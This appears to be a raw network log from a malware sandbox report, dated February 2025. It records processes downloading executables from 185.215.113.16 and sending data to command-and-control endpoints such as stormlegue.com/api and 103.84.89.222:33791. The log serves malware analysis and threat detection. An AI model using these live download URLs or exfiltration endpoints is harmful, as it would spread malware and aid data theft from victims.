                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=rnv0rd3tghr6cl15qsic6q93e0; expires=Fri, 21 Feb 2025 00:33:04 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhYE2GIuxpyeZrRjtwDOt6B9S3fyIZGFDSMXP06souaNDRuggErQnwqKVbjyDPKCZlDfmjV2ig9%2FuNWj153tYrsvCCbQOVnjsxb%2B8bC8M%2BbVb2uNrS5qIFvMMYsg8rpISA%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 914a6730fba876f9-LHR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=42521&min_rtt=42271&rtt_var=12301&sent=6&recv=7&lost=0&retrans=1&sent_bytes=3289&recv_bytes=1766&delivery_rate=93192&cwnd=253&unsent_bytes=0&cid=d18de8ca0eec8e47&ts=398&x=0"
• [ru]
  GET
  http://185.215.113.16/testdef/random.exe
  skotes.exe
  Remote address:
  185.215.113.16:80
  Request
  GET /testdef/random.exe HTTP/1.1
  Host: 185.215.113.16
  Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Thu, 20 Feb 2025 00:33:01 GMT
  Content-Type: application/octet-stream
  Content-Length: 961024
  Last-Modified: Wed, 19 Feb 2025 23:44:06 GMT
  Connection: keep-alive
  ETag: "67b66cc6-eaa00"
  Accept-Ranges: bytes
• [ru]
  GET
  http://185.215.113.16/test/am_no.bat
  skotes.exe
  Remote address:
  185.215.113.16:80
  Request
  GET /test/am_no.bat HTTP/1.1
  Host: 185.215.113.16
  Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Thu, 20 Feb 2025 00:33:05 GMT
  Content-Type: application/octet-stream
  Content-Length: 2086
  Last-Modified: Wed, 22 Jan 2025 23:08:37 GMT
  Connection: keep-alive
  ETag: "67917a75-826"
  Accept-Ranges: bytes
• [ru]
  GET
  http://185.215.113.16/luma/random.exe
  skotes.exe
  Remote address:
  185.215.113.16:80
  Request
  GET /luma/random.exe HTTP/1.1
  Host: 185.215.113.16
  Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Thu, 20 Feb 2025 00:33:54 GMT
  Content-Type: application/octet-stream
  Content-Length: 1886208
  Last-Modified: Wed, 19 Feb 2025 23:45:45 GMT
  Connection: keep-alive
  ETag: "67b66d29-1cc800"
  Accept-Ranges: bytes
• [ru]
  GET
  http://185.215.113.16/steam/random.exe
  skotes.exe
  Remote address:
  185.215.113.16:80
  Request
  GET /steam/random.exe HTTP/1.1
  Host: 185.215.113.16
  Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Thu, 20 Feb 2025 00:33:58 GMT
  Content-Type: application/octet-stream
  Content-Length: 1784832
  Last-Modified: Wed, 19 Feb 2025 23:45:55 GMT
  Connection: keep-alive
  ETag: "67b66d33-1b3c00"
  Accept-Ranges: bytes
• [ru]
  GET
  http://185.215.113.16/well/random.exe
  skotes.exe
  Remote address:
  185.215.113.16:80
  Request
  GET /well/random.exe HTTP/1.1
  Host: 185.215.113.16
  Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Thu, 20 Feb 2025 00:34:01 GMT
  Content-Type: application/octet-stream
  Content-Length: 971776
  Last-Modified: Wed, 19 Feb 2025 23:44:13 GMT
  Connection: keep-alive
  ETag: "67b66ccd-ed400"
  Accept-Ranges: bytes
• [ru]
  GET
  http://185.215.113.16/test/exe/random.exe
  skotes.exe
  Remote address:
  185.215.113.16:80
  Request
  GET /test/exe/random.exe HTTP/1.1
  Host: 185.215.113.16
  Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Thu, 20 Feb 2025 00:34:04 GMT
  Content-Type: application/octet-stream
  Content-Length: 961024
  Last-Modified: Wed, 19 Feb 2025 23:43:59 GMT
  Connection: keep-alive
  ETag: "67b66cbf-eaa00"
  Accept-Ranges: bytes
• [ru]
  GET
  http://185.215.113.16/test/amnew.exe
  skotes.exe
  Remote address:
  185.215.113.16:80
  Request
  GET /test/amnew.exe HTTP/1.1
  Host: 185.215.113.16
  Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Thu, 20 Feb 2025 00:34:07 GMT
  Content-Type: application/octet-stream
  Content-Length: 439296
  Last-Modified: Thu, 30 Jan 2025 18:34:28 GMT
  Connection: keep-alive
  ETag: "679bc634-6b400"
  Accept-Ranges: bytes
• [us]
  POST
  https://hoyoverse.blog/api
  8827e2f2e3.exe
  Remote address:
  104.21.96.1:443
  Request
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Cookie: __cf_mw_byp=feSzxHS.VL9WnxnG7FgjHFUG3.VjhEgwpfVsAiRwzac-1740011582-0.0.1.1-/api
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 87
  Host: hoyoverse.blog
  Response
  HTTP/1.1 200 OK
  Date: Thu, 20 Feb 2025 00:33:05 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Set-Cookie: PHPSESSID=hjhkvt6tl6r1m4sfum6177703g; expires=Fri, 21 Feb 2025 00:33:05 GMT; Max-Age=86400; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  cf-cache-status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwuyYQJwxpTSL0ZEl0L6TtRwwt1NZseva4RN1Yy%2BRSnssMi6%2B4GgYb80OAWxy4iFa4cbvKq885t6u28X6A9WK6zG7JFyTKZ2qUcsL5kjckv75q9UJ4JReTb04hFOUw1jFw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 914a6735dc266543-LHR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=61074&min_rtt=42669&rtt_var=29147&sent=7&recv=6&lost=0&retrans=1&sent_bytes=3606&recv_bytes=770&delivery_rate=31802&cwnd=245&unsent_bytes=0&cid=7139dac9db65b0d8&ts=584&x=0"
• [ru]
  GET
  http://185.215.113.16/defend/random.exe
  powershell.exe
  Remote address:
  185.215.113.16:80
  Request
  GET /defend/random.exe HTTP/1.1
  Host: 185.215.113.16
  Connection: Keep-Alive
  Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Thu, 20 Feb 2025 00:33:04 GMT
  Content-Type: application/octet-stream
  Content-Length: 1703936
  Last-Modified: Wed, 19 Feb 2025 23:44:45 GMT
  Connection: keep-alive
  ETag: "67b66ced-1a0000"
  Accept-Ranges: bytes
• [hk]
  POST
  http://103.84.89.222:33791/
  0f807048bd.exe
  Remote address:
  103.84.89.222:33791
  Request
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
  Host: 103.84.89.222:33791
  Content-Length: 137
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive
  Response
  HTTP/1.1 200 OK
  Content-Length: 212
  Content-Type: text/xml; charset=utf-8
  Server: Microsoft-HTTPAPI/2.0
  Date: Thu, 20 Feb 2025 00:33:14 GMT
• [hk]
  POST
  http://103.84.89.222:33791/
  0f807048bd.exe
  Remote address:
  103.84.89.222:33791
  Request
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
  Host: 103.84.89.222:33791
  Content-Length: 144
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
  Response
  HTTP/1.1 200 OK
  Content-Length: 5051
  Content-Type: text/xml; charset=utf-8
  Server: Microsoft-HTTPAPI/2.0
  Date: Thu, 20 Feb 2025 00:33:19 GMT
• [hk]
  POST
  http://103.84.89.222:33791/
  0f807048bd.exe
  Remote address:
  103.84.89.222:33791
  Request
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
  Host: 103.84.89.222:33791
  Content-Length: 36748974
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
  Response
  HTTP/1.1 200 OK
  Content-Length: 147
  Content-Type: text/xml; charset=utf-8
  Server: Microsoft-HTTPAPI/2.0
  Date: Thu, 20 Feb 2025 00:34:36 GMT
• [hk]
  POST
  http://103.84.89.222:33791/
  0f807048bd.exe
  Remote address:
  103.84.89.222:33791
  Request
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
  Host: 103.84.89.222:33791
  Content-Length: 36748966
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
• [ru]
  GET
  http://185.215.113.16/mine/random.exe
  powershell.exe
  Remote address:
  185.215.113.16:80
  Request
  GET /mine/random.exe HTTP/1.1
  Host: 185.215.113.16
  Connection: Keep-Alive
  Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Thu, 20 Feb 2025 00:33:11 GMT
  Content-Type: application/octet-stream
  Content-Length: 2134016
  Last-Modified: Wed, 19 Feb 2025 23:46:05 GMT
  Connection: keep-alive
  ETag: "67b66d3d-209000"
  Accept-Ranges: bytes
• [us]
  DNS
  ecozessentials.com
  18b64e1917.exe
  Remote address:
  8.8.8.8:53
  Request
  ecozessentials.com
  IN A
  Response
• [us]
  DNS
  api.ip.sb
  0f807048bd.exe
  Remote address:
  8.8.8.8:53
  Request
  api.ip.sb
                                                                                              IN A
                                                                                              Response
                                                                                              api.ip.sb
                                                                                              IN CNAME
                                                                                              api.ip.sb.cdn.cloudflare.net
                                                                                              api.ip.sb.cdn.cloudflare.net
                                                                                              IN A
                                                                                              104.26.12.31
                                                                                              api.ip.sb.cdn.cloudflare.net
                                                                                              IN A
                                                                                              104.26.13.31
                                                                                              api.ip.sb.cdn.cloudflare.net
                                                                                              IN A
                                                                                              172.67.75.172
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://api.ip.sb/geoip
                                                                                              0f807048bd.exe
                                                                                              Remote address:
                                                                                              104.26.12.31:443
                                                                                              Request
                                                                                              GET /geoip HTTP/1.1
                                                                                              Host: api.ip.sb
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:20 GMT
                                                                                              Content-Type: application/json; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: no-cache
                                                                                              access-control-allow-origin: *
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YR5gsLGun9Q6tiireFzGqFuhT3bm7tOuxisShhfU4EYzPYPluyJANYXfd9SjzJg2NDafLSw5oNsO9dpfrzj8EZJFNYMAYKuae1aPM7dF5lDOUDSzJfcU6%2FXogQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67964f0463ab-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43880&min_rtt=43092&rtt_var=13693&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2966&recv_bytes=357&delivery_rate=62926&cwnd=252&unsent_bytes=0&cid=76f416a4cb925ef6&ts=171&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              httpbin.org
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              httpbin.org
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              httpbin.org
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              httpbin.org
                                                                                              IN AAAA
                                                                                              Response
                                                                                              httpbin.org
                                                                                              IN A
                                                                                              52.22.198.150
                                                                                              httpbin.org
                                                                                              IN A
                                                                                              3.214.119.249
                                                                                              httpbin.org
                                                                                              IN A
                                                                                              3.208.239.150
                                                                                              httpbin.org
                                                                                              IN A
                                                                                              34.196.100.57
                                                                                            • flag-us
                                                                                              DNS
                                                                                              home.fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              home.fivenn5sr.top
                                                                                              IN A
                                                                                              Response
                                                                                              home.fivenn5sr.top
                                                                                              IN A
                                                                                              185.72.145.179
                                                                                            • flag-us
                                                                                              DNS
                                                                                              home.fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              home.fivenn5sr.top
                                                                                              IN AAAA
                                                                                              Response
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              185.72.145.179:80
                                                                                              Request
                                                                                              POST /DoDOGDWnPbpMwhmjDvNk1739958006 HTTP/1.1
                                                                                              Host: home.fivenn5sr.top
                                                                                              Accept: */*
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 449463
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              server: nginx/1.22.1
                                                                                              date: Thu, 20 Feb 2025 00:33:28 GMT
                                                                                              content-type: text/html; charset=utf-8
                                                                                              content-length: 26
                                                                                            • flag-us
                                                                                              DNS
                                                                                              friendseforever.help
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              friendseforever.help
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              shiningrstars.help
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              shiningrstars.help
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mercharena.biz
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mercharena.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              generalmills.pro
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              generalmills.pro
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              stormlegue.com
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              Response
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.16.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.96.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.64.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.112.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.48.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.32.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.80.1
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4DiwB%2BH8vrlSK1cMnCb4g0GKl%2BZWp5g6%2FREGgI%2FSN%2BINntXXSAly8zpzN2zC5IdOQqljH%2Bc5hm5%2Bx3BvWO0e8sHlezT7RzAw1bACAWH3RZvZ7gS9eFZzSBeECS7nevkaAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67ca9b7c3d94-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=mKmlT8o.g3ocveB07HuLrQ.fnYzPA5zzQkQDt59NDno-1740011608-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 43
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=m9o7m655asfp1c79ias1q636a0; expires=Fri, 21 Feb 2025 00:33:28 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IH6yBWBNU9fj7T6JnXtR8u0%2FVLR2LDKhg87i4vvWmhcjERpSwQFTpZimCS4jhr6%2BWa3KXU3UCzOow%2FQy7u%2B%2FIQA0MDktKae4gKyR2cJDeTn8wsJq%2Fz%2F6MH%2FKDyp6jIVSMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67caebab3d94-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=45664&min_rtt=41600&rtt_var=10621&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8841&recv_bytes=1053&delivery_rate=195425&cwnd=257&unsent_bytes=0&cid=505af960bab2a61e&ts=438&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=304XU9ZW
                                                                                              Cookie: __cf_mw_byp=mKmlT8o.g3ocveB07HuLrQ.fnYzPA5zzQkQDt59NDno-1740011608-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1566
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=bhiib88h9rtn1vc3on83ap273c; expires=Fri, 21 Feb 2025 00:33:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XdXQ2ilHTj4XUMe8kPqMFfHE71GZii9ZTGiv4eSiX3uxDYhMfeFTEQqu50TfUgw5dXg7vdTrz%2BJoDJsPmDVsO5kGj6HCxmPDwJY54nlSGRJRRoW3yLT8v1tIPhFmulMNAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67cd6dde3d94-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=45149&min_rtt=41480&rtt_var=8996&sent=16&recv=16&lost=0&retrans=0&sent_bytes=10023&recv_bytes=3035&delivery_rate=195425&cwnd=257&unsent_bytes=0&cid=505af960bab2a61e&ts=744&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              home.fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              home.fivenn5sr.top
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              home.fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              home.fivenn5sr.top
                                                                                              IN AAAA
                                                                                              Response
                                                                                              home.fivenn5sr.top
                                                                                              IN A
                                                                                              185.72.145.179
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006?argument=CMFIEukv9P2cH9cA1740011607
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              185.72.145.179:80
                                                                                              Request
                                                                                              GET /DoDOGDWnPbpMwhmjDvNk1739958006?argument=CMFIEukv9P2cH9cA1740011607 HTTP/1.1
                                                                                              Host: home.fivenn5sr.top
                                                                                              Accept: */*
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              server: nginx/1.22.1
                                                                                              date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              content-type: application/octet-stream
                                                                                              content-length: 10816560
                                                                                              content-disposition: attachment; filename="70291GAPXrceoaFFrkeo;"
                                                                                              last-modified: Wed, 19 Feb 2025 09:40:06 GMT
                                                                                              cache-control: no-cache
                                                                                              etag: "1739958006.1613824-10816560-3418429626"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=E8XG5QMOIB
                                                                                              Cookie: __cf_mw_byp=mKmlT8o.g3ocveB07HuLrQ.fnYzPA5zzQkQDt59NDno-1740011608-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1055
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=g56ecfq0ur6bo6lng5vj538ka3; expires=Fri, 21 Feb 2025 00:33:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8a2yCl4ok4TxDfQCX7PBjgQd2eDWX9eZIKbcwkiN9fJ8z6KFvA2nXI%2BjmApVitwltcnFlEH5PxPtZEqmnaTYXQJN4ZegkaHTT1miesJhsaH5dBhSPOExC3WTwE0dl1FmjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67cfbf71c140-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42322&min_rtt=41958&rtt_var=9424&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3566&recv_bytes=1747&delivery_rate=93074&cwnd=253&unsent_bytes=0&cid=6a92e9f7d16c8b8a&ts=314&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=mKmlT8o.g3ocveB07HuLrQ.fnYzPA5zzQkQDt59NDno-1740011608-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 77
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=emr99vmgbnqe5j15b3fioms053; expires=Fri, 21 Feb 2025 00:33:30 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=txj58nIVSts4ALlIaqx%2FJoTjY3Bcjq%2FeWPX%2Fm5dsLZun4xTlV0%2BZkDRUuWzqXR6p%2Bhw0avYAH%2BOF%2FH6T3TEn7Ksd6IHfpI87S87S8HoyuJjrwN30QA%2B1nvu9iPLieN%2Fj%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67d23aab3d94-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=41567&min_rtt=41293&rtt_var=9132&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3565&recv_bytes=760&delivery_rate=94919&cwnd=253&unsent_bytes=0&cid=df67c6a563dffbe2&ts=283&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              impactsupport.world
                                                                                              6ccbdd7074.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              impactsupport.world
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              nestlecompany.world
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              nestlecompany.world
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
